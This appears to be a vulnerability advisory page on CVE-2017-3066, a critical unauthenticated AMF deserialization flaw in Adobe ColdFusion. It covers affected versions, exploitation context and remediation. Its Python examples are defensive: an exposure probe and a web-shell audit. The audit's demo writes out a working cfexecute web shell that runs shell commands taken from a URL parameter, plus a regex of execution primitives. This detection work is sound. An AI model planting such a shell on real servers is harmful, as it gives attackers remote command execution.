CVE-2017-3066 — Adobe ColdFusion Deserialization Vulnerability

CVE-2017-3066

Adobe ColdFusion — Apache BlazeDS AMF Deserialization Enables Unauthenticated Remote Code Execution; CRITICAL 9.8; Patched April 2017 (APSB17-14)

What Is Adobe ColdFusion?

Adobe ColdFusion is a commercial Java-based web application server platform widely used in enterprise, government, and higher education environments to run ColdFusion Markup Language (CFML) web applications. ColdFusion servers commonly host internal business applications (HR portals, financial reporting, data management) and often have direct database access. ColdFusion has historically been a high-value target for web shell deployment; its bundled BlazeDS library, which handles Adobe Flex/RIA communication, added a Java deserialization attack surface on the same HTTP listener that serves the CFML applications.

Overview

Actively Exploited. CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog on February 24, 2025. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2017-3066 is a critical Java deserialization vulnerability in Adobe ColdFusion, located in the bundled Apache BlazeDS library. ColdFusion uses BlazeDS to serve Adobe Flex/RIA clients over AMF (Action Message Format); the AMF deserialization path instantiates Java classes described in the request without sufficient restriction on which classes are allowed, so an unauthenticated attacker who can reach the endpoint can send a crafted AMF request that ends in arbitrary code execution on the server. Adobe fixed the issue in ColdFusion 10 Update 23, ColdFusion 11 Update 12, and ColdFusion 2016 Update 4 (Adobe Security Bulletin APSB17-14, April 2017). CISA added CVE-2017-3066 to the KEV catalog in February 2025, nearly eight years after the patch, reflecting continued exploitation of unpatched ColdFusion deployments.

Affected Versions

ColdFusion Version                                          Status
ColdFusion 10 before Update 23                              Vulnerable
ColdFusion 11 before Update 12                              Vulnerable
ColdFusion 2016 before Update 4                             Vulnerable
ColdFusion 10 Update 23+, 11 Update 12+, 2016 Update 4+     Fixed

Technical Details

Root Cause: Apache BlazeDS AMF Deserialization Without Class Restriction

CVE-2017-3066 is a deserialization vulnerability (CWE-502) in the Apache BlazeDS library bundled with ColdFusion. BlazeDS implements AMF (Action Message Format) — a binary serialization protocol used by Adobe Flex RIA clients to communicate with server-side Java code. ColdFusion exposes a BlazeDS AMF endpoint (typically at /flex2gateway/) that accepts AMF-encoded requests.

The attack: the BlazeDS AMF deserializer instantiates Java objects described in the AMF request body without adequately restricting which classes may be instantiated. An attacker crafts an AMF payload whose embedded object graph is a gadget chain: a set of classes already present on the server's classpath whose deserialization-time behaviour, chained together, ends in execution of attacker-chosen OS commands. This is the same class of flaw (CWE-502, deserialization of untrusted data) exploited in CVE-2017-10271 (Oracle WebLogic XMLDecoder) and CVE-2017-1000353 (Jenkins CLI).

No authentication required: the /flex2gateway/ BlazeDS endpoint is reachable without credentials by design, because Flex clients talk to it directly, so exploitation needs only network access to the ColdFusion HTTP(S) port. Installations that never used Flex still expose the endpoint unless it has been explicitly disabled (see Remediation).
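The request framing described above in code. This is an added example written for this page; it is not Adobe's or Apache BlazeDS's code and it is not an exploit: it implements only the AMF0 packet layer (version, headers, messages) plus a benign probe that an exposure scan uses to confirm that a host still answers AMF on the gateway path. The function and constant names, the probe target name nonexistent.ping and the response bytes are all constructed here; a live gateway's exact error text will differ.

```python
import struct

# AMF0 markers used here: string, anonymous object, null, object-end, strict array, switch-to-AMF3
AMF0_STRING, AMF0_OBJECT, AMF0_NULL = 0x02, 0x03, 0x05
AMF0_OBJECT_END, AMF0_STRICT_ARRAY, AMF0_AVMPLUS = 0x09, 0x0A, 0x11


def _utf(s: str) -> bytes:
    """AMF0 UTF-8 string: big-endian u16 byte length, then the bytes."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def encode_value(v) -> bytes:
    """Encode the AMF0 subset a probe needs: None, str, list (strict array), dict (anonymous object)."""
    if v is None:
        return bytes([AMF0_NULL])
    if isinstance(v, str):
        return bytes([AMF0_STRING]) + _utf(v)
    if isinstance(v, list):
        return bytes([AMF0_STRICT_ARRAY]) + struct.pack(">I", len(v)) + b"".join(map(encode_value, v))
    if isinstance(v, dict):
        members = b"".join(_utf(k) + encode_value(x) for k, x in v.items())
        return bytes([AMF0_OBJECT]) + members + _utf("") + bytes([AMF0_OBJECT_END])
    raise TypeError(f"unsupported type {type(v).__name__}")


def build_amf0_request(target: str, args, response_uri: str = "/1") -> bytes:
    """Packet: version u16 (0 = AMF0), header count u16, message count u16, then one message made of
    target-uri, response-uri, body length u32 and the AMF0-encoded body."""
    body = encode_value(args)
    return (struct.pack(">HHH", 0, 0, 1) + _utf(target) + _utf(response_uri)
            + struct.pack(">I", len(body)) + body)


class _Reader:
    def __init__(self, data: bytes):
        self.d, self.i = data, 0

    def unpack(self, fmt: str):
        v = struct.unpack_from(fmt, self.d, self.i)[0]   # struct.error on truncated input
        self.i += struct.calcsize(fmt)
        return v

    def utf(self) -> str:
        n = self.unpack(">H")
        chunk = self.d[self.i:self.i + n]
        if len(chunk) != n:
            raise ValueError("truncated AMF0 string")
        self.i += n
        return chunk.decode("utf-8")

    def value(self):
        marker = self.unpack(">B")
        if marker == AMF0_NULL:
            return None
        if marker == AMF0_STRING:
            return self.utf()
        if marker == AMF0_STRICT_ARRAY:
            return [self.value() for _ in range(self.unpack(">I"))]
        if marker == AMF0_OBJECT:
            obj = {}
            while (key := self.utf()) != "":
                obj[key] = self.value()
            if self.unpack(">B") != AMF0_OBJECT_END:
                raise ValueError("malformed AMF0 object terminator")
            return obj
        if marker == AMF0_AVMPLUS:
            # 0x11 switches to AMF3, the encoding Flex clients use for typed objects and the layer in
            # which BlazeDS builds Java objects from request data; a framing probe stops here.
            raise ValueError("AMF3 object follows; not decoded by this probe")
        raise ValueError(f"unsupported AMF0 marker 0x{marker:02x}")


def parse_amf_envelope(data: bytes) -> dict:
    """Decode packet framing and AMF0 bodies; garbage raises ValueError, struct.error or IndexError."""
    r = _Reader(data)
    version, headers, messages = r.unpack(">H"), [], []
    for _ in range(r.unpack(">H")):
        name, must_understand = r.utf(), bool(r.unpack(">B"))
        r.unpack(">I")  # declared header length; gateways may send 0xFFFFFFFF ("unknown"), so ignore it
        headers.append((name, must_understand, r.value()))
    for _ in range(r.unpack(">H")):
        target, response = r.utf(), r.utf()
        r.unpack(">I")  # declared body length, likewise ignored
        messages.append({"target": target, "response": response, "body": r.value()})
    return {"version": version, "headers": headers, "messages": messages}


def looks_like_amf_gateway(content_type: str, body: bytes) -> bool:
    """Exposure check on an HTTP reply: a Flash Remoting / BlazeDS gateway answers application/x-amf with
    a message target ending in /onResult (success) or /onStatus (error object, e.g. unknown service).
    An HTML 404 or a WAF block page fails both tests."""
    if not content_type.lower().startswith("application/x-amf"):
        return False
    try:
        env = parse_amf_envelope(body)
    except (ValueError, struct.error, IndexError):
        return False
    return any(m["target"].endswith(("/onResult", "/onStatus")) for m in env["messages"])


# Constructed stand-in for a gateway's reply to a request naming a service that does not exist.
CONSTRUCTED_RESPONSE = (struct.pack(">HHH", 0, 0, 1) + _utf("/1/onStatus") + _utf("null")
                        + struct.pack(">I", 0xFFFFFFFF)
                        + encode_value({"code": "Server.Processing", "description": "service not found"}))
```

To use it against a host, POST the bytes from build_amf0_request("nonexistent.ping", ["hello"]) with Content-Type: application/x-amf to https://host/flex2gateway/ and pass the reply's Content-Type and body to looks_like_amf_gateway. A True result means the BlazeDS gateway is reachable, which, on a version from the Affected Versions table, is the entire precondition for CVE-2017-3066. The decoder deliberately stops at the AMF3 marker (0x11): a defender's probe only needs the framing, and real Flex traffic beyond that point is exactly the object encoding the vulnerable deserializer consumes.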

Attack Characteristics

Attribute Detail
Attack Vector Network — HTTP POST to /flex2gateway/ endpoint
Authentication None required
Payload Java deserialization gadget chain → OS command execution
Impact Web shell deployment, full server compromise

Discovery

Reported to Adobe and fixed in April 2017 with APSB17-14. The BlazeDS AMF deserialization flaw belongs to the broader wave of Java deserialization vulnerabilities found and exploited across many platforms in 2017.

Exploitation Context

  • ColdFusion targeted campaigns: ColdFusion servers are persistently targeted for web shell deployment; threat actors specifically probe for known ColdFusion vulnerabilities (APSB advisories) because ColdFusion hosts are often older, less monitored, and run in internal enterprise environments with database access
  • Late KEV addition (2025): the nearly eight-year gap between the patch (April 2017) and the KEV addition (February 2025) shows that attackers are still finding and exploiting ColdFusion deployments running 2017-era or older versions; enterprise ColdFusion updates are often deferred because of application compatibility concerns
  • Post-exploitation patterns: After initial access via CVE-2017-3066, attackers typically deploy a ColdFusion web shell (.cfm file) for persistent access, then use ColdFusion's native database query capabilities to extract data or pivot to connected database servers
  • CISA KEV (2025): added February 24, 2025 with a BOD 22-01 remediation deadline of March 17, 2025; CISA lists a CVE only on evidence of active exploitation, so the entry confirms that this 2017 flaw is still being used against unpatched ColdFusion hosts

Remediation

CISA BOD 22-01 Deadline: March 17, 2025. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
  1. Apply ColdFusion security updates: update to ColdFusion 10 Update 23, ColdFusion 11 Update 12, or ColdFusion 2016 Update 4 or later to patch CVE-2017-3066. All three of those branches are long out of support, so the durable fix is to migrate to a currently supported ColdFusion release, which also carries the many security fixes issued since 2017.

  2. Disable the BlazeDS AMF endpoint if not used: if no Flex/RIA client depends on it, turn off Flash Remoting in ColdFusion Administrator and remove the /flex2gateway/* servlet mapping (together with the other Flash Remoting mappings) from the ColdFusion WEB-INF/web.xml as the ColdFusion Lockdown Guide describes, then restart ColdFusion. Once the mapping is gone, requests for that path never reach the BlazeDS servlet, which removes the AMF deserialization attack surface regardless of patch level.

  3. Restrict network access to ColdFusion: ColdFusion should not be directly internet-accessible. Put it behind a reverse proxy or WAF that forwards only the application paths you actually serve and denies requests to /flex2gateway/ and the other Flash Remoting paths from untrusted networks. Because AMF is a compact binary format, signature-based inspection of request bodies is unreliable; path-level allow and deny rules are the control to rely on.

  4. Audit for web shells: compare the ColdFusion webroot and custom application directories against a known-good deployment manifest and investigate any .cfm or .cfc file that is not part of it, has been modified, or contains OS-execution primitives such as cfexecute or createObject("java", ...) calls on java.lang.Runtime. Web shells installed via CVE-2017-3066 look like ordinary ColdFusion templates and can persist for years undetected; do not rely on file timestamps alone, since attackers can backdate them.

  5. Apply Adobe's ColdFusion lockdown guide — Adobe publishes a ColdFusion Lockdown Guide with hardening steps specific to each ColdFusion version; follow it to disable unnecessary features and restrict the attack surface beyond patch application.
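Steps 2 and 4 above, checked in code. This is an added example written for this page, not Adobe tooling and not part of the Lockdown Guide: active_flex_mappings parses a web.xml fragment and reports any Flash Remoting url-pattern that is still mapped, and find_unexpected_cfml compares the webroot with a hash manifest taken from a known-good deployment. The web.xml fragment, the servlet names, the manifest format and the files created in demo() are constructed for the example; take the url-patterns to look for from your own web.xml.

```python
import hashlib
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Flash Remoting servlet mappings that reach BlazeDS (assumed names; compare with your own web.xml).
FLEX_URL_PATTERNS = {"/flex2gateway/*", "/flashservices/gateway/*"}
# OS-execution primitives commonly seen in ColdFusion web shells; a hit is a reason to look, not proof.
EXEC_PRIMITIVES = re.compile(r"<cfexecute\b|java\.lang\.Runtime|ProcessBuilder|getRuntime\s*\(", re.IGNORECASE)

# Constructed fragment in the shape of ColdFusion's WEB-INF/web.xml; servlet names are assumptions.
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet-mapping><servlet-name>CfmServlet</servlet-name><url-pattern>*.cfm</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>MessageBrokerServlet</servlet-name><url-pattern>/flex2gateway/*</url-pattern></servlet-mapping>
  <!-- <servlet-mapping><servlet-name>MessageBrokerServlet</servlet-name><url-pattern>/flashservices/gateway/*</url-pattern></servlet-mapping> -->
</web-app>"""


def active_flex_mappings(web_xml: str) -> list:
    """Return the AMF gateway url-patterns still mapped in web.xml. Commented-out mappings are
    dropped by the XML parser, so only live ones come back; an empty list means step 2 is done."""
    root = ET.fromstring(web_xml)
    found = []
    for mapping in root.iter():
        if not mapping.tag.endswith("servlet-mapping"):   # tags carry the xmlns prefix, hence endswith
            continue
        for child in mapping:
            if child.tag.endswith("url-pattern") and (child.text or "").strip() in FLEX_URL_PATTERNS:
                found.append(child.text.strip())
    return found


def build_manifest(webroot: Path) -> dict:
    """SHA-256 of every CFML file under a deployment, keyed by POSIX-style relative path. Take the
    known-good manifest from a clean build artifact, never from a host you already suspect."""
    return {p.relative_to(webroot).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in webroot.rglob("*") if p.suffix.lower() in (".cfm", ".cfc")}


def find_unexpected_cfml(webroot: Path, manifest: dict) -> list:
    """Flag CFML files absent from the manifest or whose hash differs, and note whether each contains
    an OS-execution primitive. File timestamps are deliberately not consulted (attackers backdate)."""
    findings = []
    for rel, digest in build_manifest(webroot).items():
        if manifest.get(rel) == digest:
            continue
        text = (webroot / rel).read_text(errors="replace")
        findings.append({
            "path": rel,
            "reason": "modified" if rel in manifest else "not in manifest",
            "exec_primitive": bool(EXEC_PRIMITIVES.search(text)),
        })
    return sorted(findings, key=lambda f: f["path"])


def demo() -> list:
    """Constructed webroot: baseline a clean index.cfm, then backdoor it with a cfinclude, drop a file
    shaped like the classic cfexecute web shell into uploads/, add a benign unbaselined template, audit."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.cfm").write_text("<cfoutput>Hello from the HR portal</cfoutput>\n")
        manifest = build_manifest(root)
        (root / "uploads").mkdir()
        (root / "uploads" / "h.cfm").write_text(
            '<cfexecute name="/bin/sh" arguments="-c #url.c#" timeout="5" variable="o"/><cfoutput>#o#</cfoutput>\n')
        (root / "index.cfm").write_text(
            '<cfoutput>Hello from the HR portal</cfoutput><cfinclude template="uploads/h.cfm">\n')
        (root / "help.cfm").write_text("<cfoutput>Contact the help desk</cfoutput>\n")
        return find_unexpected_cfml(root, manifest)


if __name__ == "__main__":
    print("live Flash Remoting mappings:", active_flex_mappings(SAMPLE_WEB_XML))
    for finding in demo():
        print(finding)
```

Run it on a real host with build_manifest pointed at a clean copy of the deployment and find_unexpected_cfml pointed at the live webroot (and at any custom mapping directories ColdFusion serves). Treat a "modified" hit on a file that ships with the application, like the backdoored index.cfm in the demo, as seriously as a new file: backdooring an existing template is a common way to hide a shell from a directory-listing review.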

Key Details

Property                 Value
CVE ID                   CVE-2017-3066
Vendor / Product         Adobe ColdFusion
NVD Published            2017-04-27
NVD Last Modified        2025-10-22
CVSS 3.1 Score           9.8
CVSS 3.1 Vector          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity                 CRITICAL
CWE                      CWE-502 (Deserialization of Untrusted Data)
CISA KEV Added           2025-02-24
CISA KEV Deadline        2025-03-17
Known Ransomware Use     No

CVSS 3.1 Breakdown

Attack Vector            Network
Attack Complexity        Low
Privileges Required      None
User Interaction         None
Scope                    Unchanged
Confidentiality          High
Integrity                High
Availability             High

Required Action

CISA BOD 22-01 Deadline: 2025-03-17. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date          Event
2017-04-25    Adobe releases ColdFusion updates patching CVE-2017-3066 (APSB17-14)
2017-04-27    CVE-2017-3066 published by NVD
2025-02-24    Added to CISA Known Exploited Vulnerabilities catalog
2025-03-17    CISA BOD 22-01 remediation deadline

References

Resource                                            Type
NVD: CVE-2017-3066                                  Vulnerability Database
CISA KEV Catalog Entry                              US Government
Adobe Security Bulletin APSB17-14 (ColdFusion)      Vendor Advisory